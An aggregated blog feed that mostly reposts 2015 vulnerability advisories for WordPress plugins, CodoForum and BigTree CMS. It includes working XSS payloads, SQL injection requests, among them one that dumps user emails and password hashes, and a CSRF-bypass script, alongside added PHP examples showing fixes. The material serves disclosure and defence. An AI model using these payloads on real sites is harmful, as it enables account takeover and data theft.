COPENHAGEN, Denmark (AP) Harald Nielsen, a Denmark center forward known as ''Gold Harald'' after scoring six goals at the 1960 Rome Olympics, has died. He was 73.

from FOX Sports Digital http://ift.tt/1WhX0MA
via IFTTT

ADO goalkeeper turns goal poacher with back heel vs PSV

THE HAGUE, Netherlands (AP) With his team losing 2-1 in the dying seconds of its Eredivisie opener against PSV Eindhoven, ADO The Hague goalkeeper Martin Hansen decided to cause a bit of havoc in PSV's penalty area.

from FOX Sports Digital http://ift.tt/1IYjB6D
via IFTTT

Download Free Windows 10 for the Internet of Things and Raspberry Pi 2

In the month of February 2015, second generation Raspberry Pi was made available and was commonly known as Raspberry Pi 2. Buzz was that Windows 10 will be supporting the hardware for its compatibility with the smart objects, popularly known as the ‘Internet of Things’. So, finally the Free version of Windows 10 for Raspberry Pi 2 is here. On Monday, public release of Microsoft’s


from The Hacker News http://ift.tt/1P61nF3
via IFTTT

I have a new follower on Twitter


Ted Clark
Data Guy #BigData #SQLServer #datablending #crossfit #crossfitkids @sonicxfitkids #seeyouatsonic http://t.co/54s59LdQOn
#seattle #wallingford
http://t.co/1OZlLz5z6O
Following: 3672 - Followers: 3738

August 12, 2015 at 05:01AM via Twitter http://twitter.com/tedclark

Susie (@henson40) retweeted your Tweet!

Susie retweeted your Tweet.

Patrick McGuire @mistermcguire: [FD] Stored XSS in Google Analytics by Yoast Premium allows privileged users to attack other users (WordPress plug… ift.tt/1f76nN7

Source: Gmail -> IFTTT-> Blogger

Microsoft issues Security Patches for Windows 10 and Edge Browser

Updated your PCs to Windows 10? Now it’s time to patch your Windows 10 software. Microsoft has issued its monthly Patch Tuesday by releasing 14 security bulletins, nearly half of it address vulnerabilities in its latest operating system, Windows 10. Four of them are marked critical, affecting Windows, .Net Framework, Microsoft Office, Microsoft Lync, Internet Explorer, Microsoft


from The Hacker News http://ift.tt/1IFA5nh
via IFTTT

[FD] Stored XSS in iframe allows less privileged users to do almost anything an admin can (WordPress plugin)

Details
================
Software: iframe
Version: 3.0
Homepage: http://ift.tt/1hVBaYb
Advisory report: http://ift.tt/1N3PiSc
CVE: Awaiting assignment
CVSS: 5.5 (Medium; AV:N/AC:L/Au:S/C:P/I:P/A:N)

Description
================
Stored XSS in iframe allows less privileged users to do almost anything an admin can

Vulnerability
================
Users without the unfiltered_html capability are able to insert arbitrary HTML into pages and thus exceed the privileges they were granted.

Proof of concept
================
Insert the following into a post:

    [iframe src="http://www.youtube.com/embed/4qsGTXLnmKs" width="100%" height="500" onload="alert(1)"]

Mitigations
================
Disable the plugin until a new version is released that fixes this bug. The vendor has released version 4.0 in which onload is disabled, but the other ‘event’ attributes are still permitted, including onpageshow. A number of these event attributes could be used to execute this attack, so this issue is not resolved.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: http://ift.tt/1B6NWzd

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf. This vulnerability will be published if we do not receive a response to this report within 14 days.

Timeline
================
2015-07-31: Discovered
2015-08-05: Reported to vendor via web form on http://ift.tt/1GJ8SBg
2015-08-06: Vendor responded
2015-08-10: Vendor reported fixed in version 4.0 but this does not address the issue: the plugin is still vulnerable.
2015-08-10: Published

Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.

Source: Gmail -> IFTTT-> Blogger

[FD] Reflected XSS in iframe allows unauthenticated users to do almost anything an admin can (WordPress plugin)

Details
================
Software: iframe
Version: 3.0
Homepage: http://ift.tt/1hVBaYb
Advisory report: http://ift.tt/1N3PiSh
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)

Description
================
Reflected XSS in iframe allows unauthenticated users to do almost anything an admin can

Vulnerability
================
If the “get_params_from_url” option is used in the iframe shortcode, the page/post it’s on is opened up to a reflected XSS attack.

Proof of concept
================
Paste the following into a post:

    [iframe src="http://www.youtube.com/embed/4qsGTXLnmKs" width="100%" height="500" get_params_from_url="1"]

Visit the post in a browser that doesn’t attempt to mitigate XSS attacks (i.e. Firefox) and add some extra parameters:

    http://localhost/2015/07/31/iframe/?a=%22%3E%3C/iframe%3E%3Cscript%3Ealert(`hello%20world`)%3C/script%3E

Mitigations
================
Upgrade to version 4.0 or later. If this is not possible, ensure that the ‘get_params_from_url’ argument is never used in the shortcode.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: http://ift.tt/1B6NWzd

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf. This vulnerability will be published if we do not receive a response to this report within 14 days.

Timeline
================
2015-07-31: Discovered
2015-08-05: Reported to vendor via web form on http://ift.tt/1GJ8SBg
2015-08-06: Vendor responded
2015-08-10: Vendor reported fixed in version 4.0
2015-08-10: Published

Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.
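Both iframe advisories above come down to the same two output-encoding mistakes: attributes are copied from the shortcode by blocklist (so blocking onload leaves onpageshow and the rest), and with get_params_from_url the request's query string is spliced into the src attribute raw. The following is an added example, not the iframe plugin's code, of a shortcode-to-HTML builder that allowlists attributes, requires an http(s) src, URL-encodes forwarded query parameters and attribute-escapes every value; the function name buildIframe and the constant IFRAME_ALLOWED_ATTRS are this example's own.

```php
<?php
// Added example (not the iframe plugin's code): build an <iframe> tag from shortcode
// attributes without letting either the post author or the page's query string inject markup.

const IFRAME_ALLOWED_ATTRS = ['src', 'width', 'height', 'frameborder', 'scrolling', 'allowfullscreen'];

function buildIframe(array $atts, array $requestQuery = []): string
{
    // 1. Allowlist instead of blocklist: attributes not on the list, which covers onload,
    //    onpageshow and every other on* handler whatever its name, are simply not copied.
    $clean = [];
    foreach ($atts as $name => $value) {
        $name = strtolower((string) $name);
        if (in_array($name, IFRAME_ALLOWED_ATTRS, true)) {
            $clean[$name] = (string) $value;
        }
    }
    if (!isset($clean['src'])) {
        return '';
    }

    // 2. src must be an absolute http(s) URL; javascript:, data: or malformed values
    //    produce no iframe at all rather than a "mostly escaped" one.
    $src = $clean['src'];
    $scheme = strtolower((string) parse_url($src, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true) || filter_var($src, FILTER_VALIDATE_URL) === false) {
        return '';
    }

    // 3. get_params_from_url: forward the page's query parameters to the embedded URL.
    //    http_build_query() percent-encodes keys and values, so a value such as
    //    "></iframe><script>... stays inside the URL, and step 4 escapes it for the
    //    attribute context on top of that.
    if (!empty($atts['get_params_from_url']) && $requestQuery !== []) {
        $src .= (strpos($src, '?') === false ? '?' : '&') . http_build_query($requestQuery);
    }
    $clean['src'] = $src;

    // 4. Escape every value for the attribute context; ENT_QUOTES covers both quote styles.
    $html = '<iframe';
    foreach ($clean as $name => $value) {
        $html .= ' ' . $name . '="' . htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '"';
    }
    return $html . '></iframe>';
}

// Constructed inputs mirroring the two proofs of concept in the advisories.
$stored = ['src' => 'http://www.youtube.com/embed/4qsGTXLnmKs', 'width' => '100%',
           'height' => '500', 'onload' => 'alert(1)'];
echo buildIframe($stored), "\n";
// <iframe src="http://www.youtube.com/embed/4qsGTXLnmKs" width="100%" height="500"></iframe>

$reflected = ['src' => 'http://www.youtube.com/embed/4qsGTXLnmKs', 'width' => '100%',
              'height' => '500', 'get_params_from_url' => '1'];
$query = ['a' => '"></iframe><script>alert(`hello world`)</script>'];
echo buildIframe($reflected, $query), "\n";
// the forwarded value appears only percent- and entity-encoded inside src="..."
```

Inside a real WordPress plugin the escaping in step 4 would use the core helpers esc_url() and esc_attr() rather than htmlspecialchars(); the allowlist in step 1 is the part the vendor's 4.0 fix lacked.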

Source: Gmail -> IFTTT-> Blogger

[FD] Blind SQL Injection in WP Symposium allows unauthenticated attackers to access sensitive data (WordPress plugin)

Details
================
Software: WP Symposium
Version: 15.1
Homepage: http://ift.tt/1TolapK
Advisory report: http://ift.tt/1UCda1p
CVE: Awaiting assignment
CVSS: 6.4 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:P)

Description
================
Blind SQL Injection in WP Symposium allows unauthenticated attackers to access sensitive data

Vulnerability
================
An unauthenticated user can run blind SQL injection against the site and extract password hashes and other information from the database.

Proof of concept
================
Perform the following POST to a site with the plugin installed. The request will take over 5 seconds to respond:

    POST /wordpress/wp-content/plugins/wp-symposium/ajax/forum_functions.php HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
    Accept: text/html, */*; q=0.01
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Referer: http://ift.tt/1vzc6T2
    Content-Length: 51
    Cookie: wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce; wp-settings-time-1=1421717320
    Connection: keep-alive
    Pragma: no-cache
    Cache-Control: no-cache

    action=getTopic&topic_id=1 AND SLEEP(5)&group_id=0

Mitigations
================
Upgrade to version 15.8 or later

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: http://ift.tt/1B6NWzd

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf. This vulnerability will be published if we do not receive a response to this report within 14 days.

Timeline
================
2015-03-02: Discovered
2015-07-14: Reported to simon@wpsymposium.com
2015-07-14: Requested CVE
2015-08-07: Vendor confirmed fixed in version 15.8
2015-08-10: Published

Discovered by dxw:
================
Glyn Wintle
Please visit security.dxw.com for more information.

Source: Gmail -> IFTTT-> Blogger

[FD] Stored XSS in Google Analytics by Yoast Premium allows privileged users to attack other users (WordPress plugin)

Details
================
Software: Google Analytics by Yoast Premium
Version: 5.4.4
Homepage: http://ift.tt/1ked3Xn
Advisory report: http://ift.tt/1N9k0t9
CVE: Awaiting assignment
CVSS: 5.5 (Medium; AV:N/AC:L/Au:S/C:P/I:P/A:N)

Description
================
Stored XSS in Google Analytics by Yoast Premium allows privileged users to attack other users

Vulnerability
================
A user with the “manage_options” capability but not the “unfiltered_html” capability is able to add arbitrary JavaScript to a page visible to admins.

In the default configuration of WordPress, all users with the “manage_options” capability have the “unfiltered_html” capability. However it is possible to remove the “unfiltered_html” capability from (non-super) admin users. Therefore this presents a vulnerability in which an authenticated user is able to exceed their privileges.

Proof of concept
================
Remove the “unfiltered_html” capability from the admin role and log in as a non-super admin. For testing you can remove that capability from all users with this line:

    add_filter('user_has_cap', function ($allcaps, $cap, $args) {
        $allcaps['unfiltered_html'] = false;
        return $allcaps;
    }, 10, 3);

Visit Analytics > Settings
Click the Advanced tab
Enter the following into the Subdomain tracking field (including the quotes):

    " onfocus="alert(1)

Click Save changes
Refresh the page
Click the Advanced tab
Focus the Subdomain tracking field by clicking it or tabbing to it
alert(1) will be called

Mitigations
================
Upgrade to version 5.4.5 or later.

If all users have the ‘unfiltered_html’ capability, or there is only one admin, then there is no issue.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: http://ift.tt/1B6NWzd

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf. This vulnerability will be published if we do not receive a response to this report within 14 days.

Timeline
================
2015-07-21: Discovered
2015-07-22: Reported to vendor via email
2015-07-22: Requested CVE
2015-07-10: Vendor confirmed fixed in version 5.4.5
2015-07-10: Published

Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.

Source: Gmail -> IFTTT-> Blogger

[FD] CodoForum 3.3.1 Multiple SQL Injections

CodoForum 3.3.1: Multiple SQL Injection Vulnerabilities
Security Advisory – Curesec Research Team
http://ift.tt/1h1K2mb

1. Introduction

Affected Product: CodoForum 3.3.1
Fixed in: 3.4
Fixed Version Link: http://ift.tt/1h1K2m5
Vendor Contact: admin@codologic.com
Vulnerability Type: Multiple SQL injections
Remote Exploitable: Yes
Reported to vendor: 07/07/2015
Disclosed to public: 08/07/2015
Release mode: Coordinated
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

There are two SQL injections in the CodoForum application. One is a blind injection which does not require any credentials, the other is a normal SQL injection which does require that the attacker be authenticated. These vulnerabilities can lead to data leaks as well as compromise of the host.

SQL Injection 1 (Blind)

The script that parses the request URL and displays posts depending on the retrieved id does not use proper protection against SQL injections. It does cast the retrieved user input to int, but it does not use this value; it uses the original value instead. The retrieved values are never displayed to the end user, making this a blind injection. An attacker does not need to be authenticated to perform this attack.

Proof of Concept:

    http://localhost/codoforum/index.php?u=/page/6 and 1=1%23/terms-of-service
    -> true (terms and services displayed)
    http://localhost/codoforum/index.php?u=/page/6 and 1=2%23/terms-of-service
    -> false ("You do not have enough permissions to view this page!")

Code: routes.php:593

    $pid = (int) $id;
    $user = \CODOF\User\User::get();
    $qry = 'SELECT title, content FROM ' . PREFIX . 'codo_pages p '
         . ' LEFT JOIN ' . PREFIX . 'codo_page_roles r ON r.pid=p.id '
         . ' WHERE (r.rid IS NULL OR (r.rid IS NOT NULL AND r.rid IN (' . implode($user->rids) . ')))'
         . ' AND p.id=' . $id;

SQL Injection 2

The script processing the mass sending of email does not properly handle the subject, body, or roles arguments it retrieves from a POST request. The script can only be accessed by authenticated users.

The following request:

    http://localhost/codoforum/admin/index.php?page=system/massmail
    POST: subject=USER_SUPPLIED_subj&body=USER_SUPPLIED_body

for example results in this query:

    INSERT INTO codo_mail_queue (to_address, mail_subject, body) SELECT mail, 'USER_SUPPLIED_subj', 'USER_SUPPLIED_body' FROM codo_users AS u

Code: admin/modules/system/massmail.php

    $subject = html_entity_decode($_POST['subject'], ENT_NOQUOTES, "UTF-8");
    $body = html_entity_decode($_POST['body'], ENT_NOQUOTES, "UTF-8");
    [...]
    if (isset($_POST['roles'])) {
        $condition = " INNER JOIN " . PREFIX . "codo_user_roles AS r ON r.uid=u.id "
                   . " WHERE r.rid IN (" . implode($_POST['roles']) . ")";
    }
    $qry = "INSERT INTO " . PREFIX . "codo_mail_queue (to_address, mail_subject, body)"
         . " SELECT mail, '$subject', '$body' FROM " . PREFIX . "codo_users AS u" . $condition;

3. Solution

Upgrade to Version 3.4: http://ift.tt/1h1K2m5

4. Report Timeline

07/07/2015 Informed Vendor about Issue
07/07/2015 Vendor confirmation
08/03/2015 Vendor releases Version 3.4
08/07/2015 Disclosed to public

Source: Gmail -> IFTTT-> Blogger

[FD] CodoForum 3.3.1 Multiple Cross Site Scriptings

CodoForum 3.3.1 Multiple Cross Site Scriptings
Security Advisory – Curesec Research Team
Online-Reference http://ift.tt/1Emr7Y8

1. Introduction

Affected Product: CodoForum 3.3.1
Fixed in: 3.4
Fixed Version Link: http://ift.tt/1h1K2m5
Vendor Contact: admin@codologic.com
Vulnerability Type: Multiple Reflected XSS
Remote Exploitable: Yes
Reported to vendor: 07/07/2015
Disclosed to public: 08/07/2015
Release mode: Coordinated
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

Various components of CodoForum are vulnerable to cross site scripting. With this, it is possible to inject and execute arbitrary JavaScript code. This can for example be used by an attacker to inject a JavaScript keylogger, bypass CSRF protection, or perform phishing attacks. The attacks can be exploited by getting the victim to click a link or visit an attacker controlled website.

XSS 1

CodoForum uses version 2.1.2 of HybridAuth, which has an XSS vulnerability in the installation script. This vulnerability is not present in current versions of HybridAuth.

Sample POC:

    http://localhost/codoforum/sys/Ext/hybridauth/install.php/">

Code: sys/Ext/hybridauth/install.php:316

sys/Ext/hybridauth/install.php:346

    if( isset( $item["callback"] ) && $item["callback"] ){
        $provider_callback_url = '' . $GLOBAL_HYBRID_AUTH_URL_BASE . '?hauth.done=' . $provider . '';
    }

XSS 2, 3 & 4

The page that manages users does not encode user input before echoing it, and is thus open to XSS. The vulnerable parameters are "username", "role", as well as "status". As the function retrieving POST request parameters uses GET parameters as fallback, it is possible to exploit this issue via POST or GET request.

Sample POC:

    http://localhost/codoforum/admin/index.php?page=users&username=">&role=2&status=99
    http://localhost/codoforum/admin/index.php?page=users&username=foo&role=2">&status=99
    http://localhost/codoforum/admin/index.php?page=users&username=foo&role=2&status=9">

Code: admin/modules/users.php:261

    $role = getPost('role', '0');
    $smarty->assign('role_selected', (($role == '0') ? '2' : $role));
    [...]
    $filter_url.="&role=" . $role;
    [...]
    $status = getPost('status', 99);
    $smarty->assign('status_selected', $status);
    [...]
    $filter_url.="&status=" . $status;
    [...]
    $username = getPost('username', "");
    $smarty->assign('entered_username', $username);
    [...]
    $filter_url.="&username=" . $username;

XSS 5

The page that shows a list of users does not encode the "pno" argument, and is thus open to XSS.

Sample POC:

    http://localhost/codoforum/admin/index.php?page=users&sort_order=DESC&pno=1">&sort_by=status

Code: admin/modules/users.php:326

    $sort_url = "index.php?page=users&sort_order=" . $isor . $filter_url . '&pno=' . $_GET['pno']; //put inverted link only for table heading
    $smarty->assign('sort_url', $sort_url);

XSS 6

The page that shows plugins does not properly encode the "plugin" argument, and is thus open to XSS.

Sample POC:

    http://localhost/codoforum/admin/index.php?page=ploader&plugin=

Code: admin/modules/ploader.php:85

    '.$_GET['plugin'].'

3. Proof of Concept Codes:

This proof of concept adds a new user by bypassing CSRF protection. In a similar way, the new user could be given admin rights. The script can be loaded from an external server by injecting it as payload for the XSS vulnerabilities described above. (The HTML form markup of the original script did not survive extraction; the fragments below are what remains.)

    var csrfProtectedPage = 'http://localhost/codoforum/admin/index.php?page=users';
    // get valid token for current request
    var html = get(csrfProtectedPage);
    document.body.innerHTML = html;
    var form = document.getElementById('add_user_form');
    var token = form.CSRF_token.value;
    // build form with valid token
    document.body.innerHTML += '
    ' + '' + '' + '' + '' + '' + '
    ';
    // submit form
    document.forms["myform"].submit();
    function get(url) {
        var xmlHttp = new XMLHttpRequest();
        xmlHttp.open("GET", url, false);
        xmlHttp.send(null);
        return xmlHttp.responseText;
    }

4. Solution

Upgrade to Version 3.4: http://ift.tt/1h1K2m5

5. Report Timeline

07/07/2015 Informed Vendor about Issue
07/07/2015 Vendor confirmation
08/03/2015 Vendor releases Version 3.4
08/07/2015 Disclosed to public

Source: Gmail -> IFTTT-> Blogger

[FD] BigTree CMS 4.2.3 Multiple Sql Injections

BigTree CMS 4.2.3: Multiple SQL Injection Vulnerabilities
Security Advisory – Curesec Research Team
Online-Reference: http://ift.tt/1h1JZH9

1. Introduction

Affected Product: BigTree CMS 4.2.3
Fixed in: 4.2.4
Fixed Version Link: http://ift.tt/1h1JZH1
Vendor Contact: contribute@bigtreecms.org
Vulnerability Type: Multiple SQL Injections
Remote Exploitable: Yes
Reported to vendor: 07/07/2015
Disclosed to public: 08/07/2015
Release mode: Coordinated release
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Vulnerability Description

Various components of the admin area of the BigTree CMS are vulnerable to SQL injection, which can lead to data leaks as well as compromise of the host. Please note that you have to be authenticated to exploit this issue.

SQL Injection 1

The script that processes page view requests passes the "id" GET request value to functions which put this value directly into SQL queries. No prepared statements or escaping is used, thus opening it up to SQL injection.

Proof of Concept (Show all BigTree users):

    http://localhost//BigTree-CMS/site/index.php/admin/pages/view-tree/0' union all select 1,concat(email, ":", password),3,4,5,6,7,8,9,10 from bigtree_users %23/

Code: core/admin/modules/pages/view-tree.php:151; page id is user controlled

    $nav_visible = array_merge($admin->getNaturalNavigationByParent($page["id"],1),$admin->getPendingNavigationByParent($page["id"]));
    $nav_hidden = array_merge($admin->getHiddenNavigationByParent($page["id"]),$admin->getPendingNavigationByParent($page["id"],""));
    $nav_archived = $admin->getArchivedNavigationByParent($page["id"]);

core/inc/bigtree/admin.php:2638

    static function getArchivedNavigationByParent($parent) {
        [...]
        $q = sqlquery("SELECT id,nav_title as title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views FROM bigtree_pages WHERE parent = '$parent' AND archived = 'on' ORDER BY nav_title asc");

core/inc/bigtree/admin.php:3167

    static function getHiddenNavigationByParent($parent) {
        [...]
        $q = sqlquery("SELECT id,nav_title as title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views FROM bigtree_pages WHERE parent = '$parent' AND in_nav = '' AND archived != 'on' ORDER BY nav_title asc");

core/inc/bigtree/admin.php:3758

    static function getNaturalNavigationByParent($parent,$levels = 1) {
        [...]
        $q = sqlquery("SELECT id,nav_title AS title,parent,external,new_window,template,publish_at,expire_at,path,ga_page_views FROM bigtree_pages WHERE parent = '$parent' AND in_nav = 'on' AND archived != 'on' ORDER BY position DESC, id ASC");

core/inc/bigtree/admin.php:4531

    static function getPendingNavigationByParent($parent,$in_nav = true) {
        [...]
        $q = sqlquery("SELECT * FROM bigtree_pending_changes WHERE pending_page_parent = '$parent' AND `table` = 'bigtree_pages' AND type = 'NEW' ORDER BY date DESC");

SQL Injection 2

When creating a new user, the email address is not checked server side, so it is possible to set it to anything. When logging in, the email address is saved in the session, and later used to retrieve user data. This happens without prepared statements, thus opening the query up to SQL injection.

Proof of Concept:

    1. Create User f'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10%23bar@example.com
    2. Log in
    3. result can be seen in multiple places

Code: core/inc/bigtree/admin.php:81

    $f = sqlfetch(sqlquery("SELECT * FROM bigtree_users WHERE id = '".$_SESSION["bigtree_admin"]["id"]."' AND email = '".$_SESSION["bigtree_admin"]["email"]."'"));

SQL Injection 3 (Blind)

The function used to calculate the SEO score of a post for Ajax requests passes unsanitized user input to a function performing the actual computation. This function does not use prepared statements, thus opening it up to SQL injection. The result of the query is never echoed to the end user, making this a blind SQL injection.

Proof of Concept:

    http://localhost//BigTree-CMS/site/index.php/admin/ajax/pages/get-seo-score
    POST: content=foo&resources=bar&id=foo' or 1=2%23&title=Trees of All Sizes

    http://localhost//BigTree-CMS/site/index.php/admin/ajax/pages/get-seo-score
    POST: content=foo&resources=bar&id=foo' or 1=1%23&title=Trees of All Sizes

Code: core/admin/ajax/pages/get-seo-score.php:4:

    $seo = $admin->getPageSEORating($_POST,$_POST["resources"]);

core/inc/bigtree/admin.php:4222

    static function getPageSEORating($page,$content) {
        [...]
        if ($page["title"]) {
            $score += 5;
            // They have a title, let's see if it's unique
            $r = sqlrows(sqlquery("SELECT * FROM bigtree_pages WHERE title = '".sqlescape($page["title"])."' AND id != '".$page["id"]."'"));

3. Solution

To mitigate this issue please upgrade at least to version 4.2.3: http://ift.tt/1h1JZH1

Please note that a newer version might already be available.

4. Report Timeline

07/07/2015 Informed Vendor about Issue
07/08/2015 Vendor sent Fixes for confirmation
07/10/2015 Fixes Confirmed
07/26/2015 Vendor releases Version 4.2.3
08/07/2015 Disclosed to public
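The bizidea, CodoForum and BigTree SQL injection advisories above all show the same defect: user-controlled values (a page or news id, a role list, an email kept in the session, a title) concatenated into SQL text, in CodoForum's case even after the integer cast had already been computed and then ignored. As an added example that is not code from any of these projects, here are the two CodoForum query shapes rewritten with PDO prepared statements; the helper names (safePrefix, fetchPage, queueMassMail) and the SQLite demo data are this example's own, while table and column names follow the CodoForum advisory.

```php
<?php
// Added example, not CodoForum, BigTree or bizidea code: the query shapes the advisories
// build by string concatenation, rewritten with PDO prepared statements. The demo at the
// bottom uses an in-memory SQLite database with constructed rows so it runs stand-alone.

function safePrefix(string $prefix): string
{
    // The table prefix is configuration, not user input, but it is still interpolated
    // into SQL text, so restrict it to identifier characters.
    if (!preg_match('/^[A-Za-z0-9_]{0,32}$/', $prefix)) {
        throw new InvalidArgumentException('invalid table prefix');
    }
    return $prefix;
}

// routes.php pattern: the original cast $id to int but then concatenated the raw $id.
// Here only a validated integer reaches the database, and the role list becomes one
// placeholder per element instead of implode() into the SQL string.
function fetchPage(PDO $pdo, string $prefix, $id, array $roleIds): ?array
{
    if (!is_scalar($id) || !preg_match('/^[1-9][0-9]{0,9}$/', (string) $id)) {
        return null;                                   // "6 and 1=1#" never becomes SQL
    }
    $prefix = safePrefix($prefix);
    $params = [];
    $roleClause = 'r.rid IS NULL';
    if ($roleIds !== []) {
        $roleClause .= ' OR r.rid IN (' . implode(',', array_fill(0, count($roleIds), '?')) . ')';
        $params = array_map('intval', $roleIds);
    }
    $params[] = (int) $id;
    $stmt = $pdo->prepare(
        "SELECT title, content FROM {$prefix}codo_pages p"
        . " LEFT JOIN {$prefix}codo_page_roles r ON r.pid = p.id"
        . " WHERE ($roleClause) AND p.id = ?"
    );
    $stmt->execute($params);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// massmail.php pattern: subject and body are bound values and the role filter is a list
// of integers expanded to placeholders, so neither can change the statement's structure.
function queueMassMail(PDO $pdo, string $prefix, string $subject, string $body, array $roles = []): int
{
    $prefix = safePrefix($prefix);
    $sql = "INSERT INTO {$prefix}codo_mail_queue (to_address, mail_subject, body)"
         . " SELECT u.mail, ?, ? FROM {$prefix}codo_users AS u";
    $params = [$subject, $body];
    if ($roles !== []) {
        $ids = array_map('intval', $roles);
        $sql .= " INNER JOIN {$prefix}codo_user_roles AS r ON r.uid = u.id"
              . ' WHERE r.rid IN (' . implode(',', array_fill(0, count($ids), '?')) . ')';
        $params = array_merge($params, $ids);
    }
    $stmt = $pdo->prepare($sql);
    $stmt->execute($params);
    return $stmt->rowCount();
}

// Demo with constructed data (schema reduced to the columns the queries touch).
$pdo = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$pdo->exec('CREATE TABLE codo_pages (id INTEGER PRIMARY KEY, title TEXT, content TEXT)');
$pdo->exec('CREATE TABLE codo_page_roles (pid INTEGER, rid INTEGER)');
$pdo->exec('CREATE TABLE codo_users (id INTEGER PRIMARY KEY, mail TEXT)');
$pdo->exec('CREATE TABLE codo_user_roles (uid INTEGER, rid INTEGER)');
$pdo->exec('CREATE TABLE codo_mail_queue (to_address TEXT, mail_subject TEXT, body TEXT)');
$pdo->exec("INSERT INTO codo_pages VALUES (6, 'Terms of Service', 'constructed page body')");
$pdo->exec("INSERT INTO codo_page_roles VALUES (6, 2)");
$pdo->exec("INSERT INTO codo_users VALUES (1, 'alice@example.com'), (2, 'bob@example.com')");
$pdo->exec("INSERT INTO codo_user_roles VALUES (1, 2), (2, 3)");

var_dump(fetchPage($pdo, '', 6, [2]) !== null);      // bool(true): legitimate request
var_dump(fetchPage($pdo, '', '6 and 1=1#', [2]));    // NULL: the advisory's PoC input is rejected
var_dump(fetchPage($pdo, '', 6, [3]));               // NULL: caller lacks the page's role
echo queueMassMail($pdo, '', "Hello ' OR 1=1 -- ", 'body', [2]), " row(s) queued\n"; // 1: quote is data
```

The BigTree queries (parent id, session email, title and id in the SEO check) have the same shape as fetchPage: bind each value and let the validation decide what is an id, rather than relying on an escaping helper such as sqlescape() being remembered at every call site.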

Source: Gmail -> IFTTT-> Blogger

[FD] BigTree CMS 4.2.3 Multiple Cross-Site-Scripting Vulnerabilities

BigTree CMS 4.2.3: Multiple Cross Site Scripting Vulnerabilities
Security Advisory – Curesec Research Team

Online Reference: http://ift.tt/1Emr924

1. Introduction

Affected Product:    BigTree CMS 4.2.3
Fixed in:            4.2.4
Fixed Version Link:  http://ift.tt/1h1JZH1
Vendor Contact:      contribute@bigtreecms.org
Vulnerability Type:  Multiple Reflected XSS
Remote Exploitable:  Yes
Reported to vendor:  07/07/2015
Disclosed to public: 08/07/2015
Release mode:        Coordinated release
CVE:                 n/a
Credits:             Tim Coen of Curesec GmbH

2. Vulnerability Description

Various components of the BigTree CMS are vulnerable to cross site scripting. With this, it is possible to inject and execute arbitrary JavaScript code. This can for example be used by an attacker to inject a JavaScript keylogger or to perform phishing attacks.

Four issues are described below: three are exploitable via GET and one via POST. The GET-based attacks can be exploited by getting the victim to click a link or visit an attacker-controlled website. The POST-based attack requires the victim to visit an attacker-controlled website.

XSS 1 (via POST)

The script that processes Ajax requests for the file browser does not properly sanitize the "file" parameter, opening it up to reflected XSS.

Sample POC:

Payload to load a remote script:
   ">

Code:
   core/admin/ajax/developer/extensions/file-browser.php:127:
      " />

XSS 2 (via GET)

The script that processes Ajax requests for the integrity check does not properly sanitize the "id" parameter, opening it up to reflected XSS.

Limitations: Single and double quotes are escaped.

Sample POC:
   http://localhost/BigTree-CMS/site/index.php/admin/ajax/dashboard/integrity-check/module?table=1&id=

Loading a remote script:
   http://localhost/BigTree-CMS/site/index.php/admin/ajax/dashboard/integrity-check/module?table=1&id=

Code:
   core/admin/ajax/dashboard/integrity-check/module.php:31:
      /"

XSS 3 (via GET)

The script that processes page view requests does not properly sanitize the "id" value given in the URL, opening it up to reflected XSS.

Limitations: forward slash cannot be used.

Sample POC:
   http://localhost/BigTree-CMS/site/index.php/admin/pages/view-tree/'">

Loading a remote script:
   http://localhost/BigTree-CMS/site/index.php/admin/pages/view-tree/'">

Code: The input is echoed in multiple places:
   core/admin/modules/pages/_properties.php:54
   core/admin/modules/pages/_properties.php:70
   core/admin/layouts/default.php:153
      / "

XSS 4 (via GET)

The "id" value described in the previous section is additionally echoed inside script tags, opening it up to a further XSS injection. Because the reflection lands in a JavaScript string literal, the payload closes that literal and the surrounding jQuery calls, runs its own code, and then reopens a matching literal so the rest of the script still parses.

Limitations: forward slash cannot be used and single and double quotes are escaped.

Simple POC:
   http://localhost/BigTree-CMS/site/index.php/admin/pages/view-tree/xsstest", }});}});alert(1);$("%23pages_pages").sortable({ axis: "y", containment: "parent", handle: ".icon_sort", items: "li", placeholder: "ui-sortable-placeholder", tolerance: "pointer", update: function() {$.ajax("", { type: "POST", data: { id: "

Code:
   core/admin/modules/pages/_nav-tree.php:138

3. Proof of Concept Codes

3.1 Example Phishing Site

